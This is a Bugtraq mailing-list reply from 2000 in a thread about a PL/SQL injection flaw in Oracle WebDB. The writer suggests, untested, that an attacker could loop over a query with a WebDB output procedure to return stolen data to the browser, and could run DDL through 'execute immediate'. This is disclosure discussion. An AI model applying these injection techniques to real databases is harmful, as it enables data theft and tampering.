[18278] in bugtraq
Re: Oracle WebDb engine brain-damagse
daemon@ATHENA.MIT.EDU (Kuznetsov, Vasily)
Thu Dec 21 13:55:18 2000
MIME-Version: 1.0
Content-Type: text/plain; charset="koi8-r"
Message-ID: <3EC6A521B353D111B05A00A024D8DDA3011DAEB0@hermes.office>
Date: Thu, 21 Dec 2000 11:43:39 +0500
Reply-To: VKuznetsov@MICROTEST.RU
From: "Kuznetsov, Vasily" <VKuznetsov@MICROTEST.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
> -----Original Message-----
> From: McAllister, Andrew [mailto:McAllisterA@umsystem.edu]
> Sent: Thursday, December 21, 2000 3:47 AM
> To: BUGTRAQ@securityfocus.com
> Subject: Re: [BUGTRAQ] Oracle WebDb engine brain-damagse
...
>
> I'm not sure that a select would work as I believe that the
> query is running
> inside a PL/SQL prepared statement where output is not sent
> to stdout, i.e.
> the browser. In other words I believe your statement is
> translated into
> something like:
>
> begin
> some_webdb_standard_stored_procedre_call;
> select * from (tablename);
> end;
>
Looks same to me
> This is not to say that you can't issue some dangerous commands as you
> suggest, just that you won't see any data as a result. Also,
Attacker could probably use standard WebDB means of output to
get the data to his browser. something like
for i in (select...) loop
some_web_db_output_proc(...);
end loop;
would probably do the trick.
> I believe that
> only data manipulation commands will work in this context e.g. delete,
> update, insert. I don't believe definition commands will
> work, e.g. drop,
> create. Again I don't have WebDB, so I cannot verify.
DDL commands can probably be issued via execute immediate,
although I too don't have WebDB around to check.
Vasily Kuznetsov
